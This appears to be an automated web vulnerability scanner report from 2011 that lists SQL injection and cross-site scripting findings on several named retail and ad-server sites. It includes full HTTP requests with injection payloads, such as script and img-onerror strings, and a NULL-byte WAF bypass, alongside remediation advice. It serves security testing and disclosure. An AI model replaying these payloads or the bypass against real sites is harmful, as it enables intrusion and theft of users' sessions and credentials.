The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /secure/orderlogin.asp HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00' Connection: close
GET /secure/orderlogin.asp HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'' Connection: close
<html> <head> <title>Order Login</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="TigerDirect.com is your complete o ...[SNIP]...
1.20. https://www.tigerdirect.ca/secure/orderlogin.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
https://www.tigerdirect.ca
Path:
/secure/orderlogin.asp
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /secure/orderlogin.asp?1'=1 HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /secure/orderlogin.asp?1''=1 HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the DB cookie submitted to the URL /cgi-bin/order.asp is copied into an HTML comment at the URL /applications/searchtools/item_upsell.asp. The payload 45303--><img%20src%3da%20onerror%3dalert(1)>ee996b5153 was submitted in the DB cookie. This input was returned as 45303--><img src=a onerror=alert(1)>ee996b5153 in a subsequent request for the URL /applications/searchtools/item_upsell.asp.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Issue background
Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.
The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.
Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).
Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.
Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cc21"><script>alert(1)</script>5b35710a4ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.03cc21"><script>alert(1)</script>5b35710a4ec/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e15d7"><script>alert(1)</script>053fcfd23f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1e15d7"><script>alert(1)</script>053fcfd23f1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26556"><script>alert(1)</script>dbb612cc67a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1/195968726556"><script>alert(1)</script>dbb612cc67a/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c638a"><script>alert(1)</script>d0630b63a7e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1/1959687/0c638a"><script>alert(1)</script>d0630b63a7e/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2931"><script>alert(1)</script>55800ca2451 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1/1959687/0/225f2931"><script>alert(1)</script>55800ca2451/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b9b4"><script>alert(1)</script>ed9624c5b60 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH6b9b4"><script>alert(1)</script>ed9624c5b60;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
3.7. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/adiframe/3.0/5330.1/1959687/0/225/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48be4"><script>alert(1)</script>b94f62885a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]&48be4"><script>alert(1)</script>b94f62885a9=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 288
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62e7"><script>alert(1)</script>2ee57e1ea08 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]f62e7"><script>alert(1)</script>2ee57e1ea08 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload a9a66><script>alert(1)</script>e3dd50b670a was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=a9a66><script>alert(1)</script>e3dd50b670a HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 278
The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d513'%3balert(1)//05c09b48c56 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as 9d513';alert(1)//05c09b48c56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the br request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39ca8'%3balert(1)//8ccd711ec0c was submitted in the br parameter. This input was echoed as 39ca8';alert(1)//8ccd711ec0c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:10:56 GMT Server: Microsoft-IIS/6.0 P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 96131
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> PCT Trip Details </title><link h ...[SNIP]... <IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=tgdirect39ca8';alert(1)//8ccd711ec0c;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0> ...[SNIP]...
3.12. http://computerrentals.com/search.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://computerrentals.com
Path:
/search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5b813--><script>alert(1)</script>42354065ffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>CRE - Computer Rentals & AV Solutions Search Results for Technology ...[SNIP]... <input type="text" name="q" value="xss desktop se/5b813--><script>alert(1)</script>42354065ffbrver" /> ...[SNIP]...
3.13. http://computerrentals.com/search.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://computerrentals.com
Path:
/search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 908aa</script><script>alert(1)</script>fcdc7750642 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>CRE - Computer Rentals & AV Solutions Search Results for Technology ...[SNIP]... ormRoot('cse-search-form'); options.setAutoComplete(true);
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a5c6</script><script>alert(1)</script>8e5b253ccc9 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>CRE - Computer Rentals & AV Solutions Search Results for Technology ...[SNIP]... Root('cse-search-form'); options.setAutoComplete(true);
The value of the q request parameter is copied into an HTML comment. The payload 3f8c1--><script>alert(1)</script>74fb586f5cd was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>CRE - Computer Rentals & AV Solutions Search Results for Technology ...[SNIP]... <input type="text" name="q" value="xss desktop server3f8c1--><script>alert(1)</script>74fb586f5cd" /> ...[SNIP]...
The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69d54'%3balert(1)//1f2bc4e80a5 was submitted in the u parameter. This input was echoed as 69d54';alert(1)//1f2bc4e80a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 20e21<script>alert(1)</script>7f372d558b5 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?sid=c4efaaaa-166e-4641-8342-a5d43008a6da&url=http%3A%2F%2Fwww.homedepot.ca%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FHome%3FstoreId%3D10051%26catalogId%3D10051%26langId%3D-15&rurl=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp&callback=jQuery15107517646802589297_131738416077120e21<script>alert(1)</script>7f372d558b5&pv%5Bpv%5D=1&pc%5Bpc%5D=1&_=1317384160773 HTTP/1.1 Host: e.targetfuel.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload e76be<script>alert(1)</script>a0d7c65495 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload de589<img%20src%3da%20onerror%3dalert(1)>0d8ae2ced7c was submitted in the REST URL parameter 4. This input was echoed as de589<img src=a onerror=alert(1)>0d8ae2ced7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a4e3<img%20src%3da%20onerror%3dalert(1)>2ed1c13b337 was submitted in the REST URL parameter 4. This input was echoed as 8a4e3<img src=a onerror=alert(1)>2ed1c13b337 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 54169<img%20src%3da%20onerror%3dalert(1)>14dae13a434 was submitted in the REST URL parameter 4. This input was echoed as 54169<img src=a onerror=alert(1)>14dae13a434 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8c84<img%20src%3da%20onerror%3dalert(1)>76ce5578b56 was submitted in the REST URL parameter 4. This input was echoed as a8c84<img src=a onerror=alert(1)>76ce5578b56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f184<img%20src%3da%20onerror%3dalert(1)>54ec4aa3fa6 was submitted in the REST URL parameter 4. This input was echoed as 1f184<img src=a onerror=alert(1)>54ec4aa3fa6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 22c96<img%20src%3da%20onerror%3dalert(1)>85ffdcff86d was submitted in the REST URL parameter 4. This input was echoed as 22c96<img src=a onerror=alert(1)>85ffdcff86d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 71350<img%20src%3da%20onerror%3dalert(1)>69a1cd2b9d4 was submitted in the REST URL parameter 4. This input was echoed as 71350<img src=a onerror=alert(1)>69a1cd2b9d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ecc70<img%20src%3da%20onerror%3dalert(1)>580250d2dd7 was submitted in the REST URL parameter 4. This input was echoed as ecc70<img src=a onerror=alert(1)>580250d2dd7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4349<img%20src%3da%20onerror%3dalert(1)>1d1ac9815d3 was submitted in the REST URL parameter 4. This input was echoed as e4349<img src=a onerror=alert(1)>1d1ac9815d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ac27d<img%20src%3da%20onerror%3dalert(1)>238586c1107 was submitted in the REST URL parameter 4. This input was echoed as ac27d<img src=a onerror=alert(1)>238586c1107 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52977<img%20src%3da%20onerror%3dalert(1)>af894da79fc was submitted in the REST URL parameter 4. This input was echoed as 52977<img src=a onerror=alert(1)>af894da79fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 755a4<img%20src%3da%20onerror%3dalert(1)>e9fdd65a692 was submitted in the REST URL parameter 4. This input was echoed as 755a4<img src=a onerror=alert(1)>e9fdd65a692 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 83cda<img%20src%3da%20onerror%3dalert(1)>302fb0df51c was submitted in the REST URL parameter 4. This input was echoed as 83cda<img src=a onerror=alert(1)>302fb0df51c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dcef3<img%20src%3da%20onerror%3dalert(1)>acb8607ef78 was submitted in the REST URL parameter 4. This input was echoed as dcef3<img src=a onerror=alert(1)>acb8607ef78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8fd5d<img%20src%3da%20onerror%3dalert(1)>e5d3540ef89 was submitted in the REST URL parameter 4. This input was echoed as 8fd5d<img src=a onerror=alert(1)>e5d3540ef89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 75176<img%20src%3da%20onerror%3dalert(1)>82dc671c0f8 was submitted in the REST URL parameter 4. This input was echoed as 75176<img src=a onerror=alert(1)>82dc671c0f8 in the application's response.
